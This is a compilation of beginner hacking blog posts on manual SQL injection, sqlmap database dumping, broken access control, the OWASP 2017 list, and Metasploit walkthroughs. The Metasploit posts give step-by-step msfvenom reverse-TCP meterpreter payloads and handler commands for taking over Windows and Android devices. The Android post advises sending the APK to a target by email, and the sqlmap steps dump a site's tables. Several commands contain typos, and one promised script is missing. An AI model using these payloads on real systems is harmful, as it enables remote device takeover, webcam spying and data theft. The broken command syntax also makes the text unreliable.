Manual SQL Injection

• Hello everyone, this blog is related manual SQL injection.

Step 1: 

First you have to open your target website, here we are going to perform manual SQL injection on .pk website. 

 

Website:www.sample.com

Step:1

First we have to check that this website is inject or not (add ' after URL)

yes!!! it is

Step:2

Now we have to check available tables in website using given SQL query “order by”

Step:3

Now using the union select query. add - before id number

Now you retrieve data according to you needs

Step:4

Now replacing 2 with database(),we got the available database.

Step:5

Now using union select group concat query we got the following database tables details.

Step:6

Now using union select group concat query we got the following database tables columns details.

Huh! SQL Injections are all about guess & try. It could take a lot of trial & error to get that perfect query.

 

Database dump using sqlmap

•  Hello everyone this blog is related to database  dump using sqlmap.
• Database dump using Sqlmap

Step 1: Open Kali Linux

Step 2: Type command to get all functions of ‘Sqlmap’.

              # sudo sqlmap -hh

Step 3: Type command to see that the target website contains sql injection vulnerability or not.

             # sudo sqlmap -u “targetsite.com”

Step 4: To see the number of database target website has can be done with

             # sudo sqlmap -u “targetsite.com” –dbs

Step 5: To list the tables that we want from any of the above database use command

             # sudo sqlmap -u “targetsite.com” -D database_name –tables

Step 6: To list content of the particular table use command

              # sudo sqlmap -u “targetsite.com” -D database_name -T table_name –dump

 

Step 7:  If you want to use dictionary attack in sqlmap when you receive hashed password, follow the given steps

                                       

Step 8: You got the data.

 

SQL Injection Vulnerability

SQL injection is a type of cyber attack in which an attacker inserts malicious code into a database through a website's input field, in order to gain unauthorized access to sensitive information stored in the database. This type of attack can be particularly damaging because it allows the attacker to manipulate and extract data from the database, potentially exposing sensitive information such as passwords, credit card numbers, and personal details.

There are several tools and methods that attackers may use to carry out SQL injection attacks. One common method is to use a web application scanner, such as SQLMap or Havij, to identify and exploit vulnerabilities in a website's code. Attackers may also manually inject malicious code into a website's input fields, using techniques such as error-based injection or union-based injection.

An example of an SQL injection exploit might look like this:

http://example.com/login.php?username=admin'%20OR%201=1--

In this example, the attacker has appended an additional piece of code to the end of the URL, which tells the database to return all rows where the username is "admin" or where 1=1. This will always return true, so the database will return all rows in the table, potentially exposing sensitive information.

To protect against SQL injection attacks, it is important to use parameterized queries and input validation. Parameterized queries allow you to specify placeholders for user input, rather than directly inserting user input into the query. This helps to prevent attackers from injecting malicious code into the query.

Input validation is also important, as it helps to ensure that user input meets certain criteria before it is processed by the application. This can help to prevent attackers from injecting malicious code into the input fields.

Other measures that can be taken to protect against SQL injection attacks include using prepared statements, using stored procedures, and escaping special characters in user input. It is also a good practice to use parameterized queries and stored procedures to execute dynamic SQL statements, as this can help to prevent SQL injection attacks.

In addition to these measures, it is also important to keep the database and all applications up to date with the latest security patches, as this can help to prevent vulnerabilities from being exploited by attackers. It is also a good idea to regularly scan your website for vulnerabilities, and to use a web application firewall to help block malicious traffic.

Overall, SQL injection attacks can be devastating for businesses and individuals, as they can expose sensitive information and compromise the security of a database. By implementing the proper safeguards, however, it is possible to protect against these types of attacks and keep your database and sensitive information secure.

Broken Access Control Vulnerability

Broken access control is a type of security vulnerability that occurs when a system fails to properly enforce authorization and authentication controls. This can allow unauthorized users to gain access to restricted resources or perform actions that they are not authorized to perform.

One example of a broken access control vulnerability is a website that does not properly restrict access to administrative pages. An attacker could potentially exploit this vulnerability by crafting a script that allows them to bypass the authorization controls and gain access to the administrative pages.

For example, consider the following exploit script:

In this example, the script sends a GET request to the administrative page of the website and checks the status code of the response. If the status code is 200 (success), the script prints a message indicating that it was able to access the administrative page. If the status code is anything other than 200, the script prints a message indicating that access was denied.

To prevent this type of broken access control vulnerability, it is important to implement strong and secure authentication and authorization controls. This includes using strong passwords, implementing multi-factor authentication, and regularly reviewing and updating access control policies to ensure that they are up-to-date and effective.

In addition to implementing strong authentication and authorization controls, it is also important to use secure communication protocols to prevent the interception of sensitive information. This can include the use of secure sockets layer (SSL) or transport layer security (TLS) to encrypt communication between the user and the website.

Finally, it is important to regularly review and monitor access control logs to identify and address any potential vulnerabilities. This can help to prevent unauthorized access to restricted resources and ensure that access control policies are being properly enforced.

Summary:

Broken access control is a serious security vulnerability that can allow unauthorized users to gain access to restricted resources or perform unauthorized actions. To prevent these vulnerabilities, it is important to implement strong and secure authentication and authorization controls, use secure communication protocols, and regularly review and monitor access control logs.

OWASP Top 10 Web Application Vulnerability:2017

The OWASP (Open Web Application Security Project) Top 10 is a list of the most common and most critical web application vulnerabilities. The list is compiled and maintained by the OWASP Foundation, a non-profit organization that promotes web application security.

The OWASP Top 10 is designed to provide web developers, security professionals, and organizations with a prioritized list of the most critical web application vulnerabilities. The list is updated every three to four years to reflect the current state of web application security.

The list version of the OWASP Top 10, released in 2017, includes the following vulnerabilities:

1. Injection: This vulnerability occurs when user input is not properly validated and is passed directly to a system command or database query, allowing an attacker to execute arbitrary code or manipulate data.

2. Broken Authentication and Session Management: This vulnerability occurs when authentication and session management controls are improperly implemented, allowing an attacker to gain unauthorized access to the system.

3. Cross-Site Scripting (XSS): This vulnerability occurs when user input is not properly validated and is returned to the user's browser, allowing an attacker to inject malicious code that is executed by the browser.

4. Insecure Direct Object References: This vulnerability occurs when an application references an object directly, such as a file or database record, without proper validation, allowing an attacker to access unauthorized objects.

5. Security Misconfiguration: This vulnerability occurs when an application is misconfigured, exposing it to potential attacks.

6. Sensitive Data Exposure: This vulnerability occurs when sensitive data, such as passwords or credit card numbers, is transmitted in an insecure manner or stored in an insecure location.

7. Cross-Site Request Forgery (CSRF): This vulnerability occurs when an attacker tricks a user into making an unauthorized request to a website, potentially allowing the attacker to perform actions on behalf of the user.

8. Using Components with Known Vulnerabilities: This vulnerability occurs when an application uses third-party components that have known vulnerabilities, exposing the application to potential attacks.

9. Insufficient Logging and Monitoring: This vulnerability occurs when an application does not adequately log and monitor security events, making it difficult to detect and respond to potential attacks.

10. Failure to Restrict URL Access: This vulnerability occurs when an application does not properly restrict access to specific URLs, potentially allowing unauthorized users to access restricted resources.

By understanding and addressing these vulnerabilities, organizations can significantly improve the security of their web applications and protect against potential attacks.

Windows Exploit using Metasploit

 

•   Hello everyone, this blog is related to exploiting windows system(win-10) using Kali Linux.
• So, basically we need two operating systems, First one is kali(attacker) and second one is Windows(victim).
• This Practical works when both of the machines are in same network.
• So. I have installed Kali-linux and windows-10 in Virtualbox.
• I have managed to put the both machines on same network, you have to do same if you are also trying to do same as me. Otherwise Important is both the machines has to be on same network,
• This also works if you have host machine kali and on other side you have windows-10(PC) with you.
• You can also install kali on Virtualbox and set it to NAT network(Bridge is recommended).
• For surety u can ping the windows 10 machine from Kali to check that the machines are on same network or not.

Practical Starts Here :

STEP 1 :- 

Go to the Kali Linux terminal and type the following command as shown below:-

• msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=your IP of Kali lport=8080 -f exe > exploit name.exe

 

STEP 2 :-

Now the exe file is created so move it to your target machine (NOTE:- TURN OFF THE ANTIVIRUS TO EXECUTE THE FILE).

STEP 3 :-

 Now type the following commands as follows:-

• msfconsole
• use exploit/multi/handlers 
• Set payload windows/x64/meterpreter/reverse_tcp
• Set lhost your IP of Kali 
• set lport 8080
• exploit 

STEP 4 :- 

Now click on the exe file from your Target machine .

STEP 5 :- 

Now you can able to see that session is created in Kali Linux .

STEP 6 :- 

Now you have all control to your target machine which is windows machine in our case .

STEP 7 :- 

I have shown you example by opening webcam of target machine .

STEP 8 :- 

You can also use different commands to operate the target machine . To know the different commands type help and you will get all commands listed .

Android Exploitation using Metasploit

 

Hello everyone, this blog is related to exploiting Android using Kali Linux.

Title: Exploiting Android Devices using Kali Linux Introduction: 

In this blog post, we will explore how to exploit Android devices using Kali Linux. We will use Kali Linux's powerful tools and techniques to create a payload, send it to the target device, and gain control over it. Please note that this guide is for educational purposes only, and any unauthorized use of these techniques is strictly prohibited.

Step 1: Generating the Payload Open Terminal or Root Terminal in Kali Linux. Write the following command to generate the payload for Android: 

•  Open Terminal or Root Terminal in Kali-Linux 
• Write the payload for android which is given below 

msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Choose a Port> -o android.apk 

Replace <Your IP Address> with your machine's IP address and <Choose a Port> with a port number of your choice (e.g., 4444, 8080).       

Step 2:- Sending and Installing the Payload

• Send the generated APK file (android.apk) to the target Android device using a preferred method (email, file sharing, etc.). 
• On the target device, locate the APK file and install it. You may receive a security warning during installation. Proceed by tapping "Install Anyway." [Include an image of the installation screen]
•  Once installed, the application's icon will appear on the device's home screen.

• Then after installing it and it will ask for permission that shown bellow 

• Then after touch on install Anyway It will look like that shown in the image  [MainActivity]

 Step 3:-

Write commands shown bellow

• Msfconsole 
• use exploit/multi/handlers
• Set payload android/meterpreter/reverse_tcps
• Set lhost <Your IP address> 
• Set lport <which you write in payload>
• run/exploit

  Then after click on mainactivity on android

[It's msfconsole]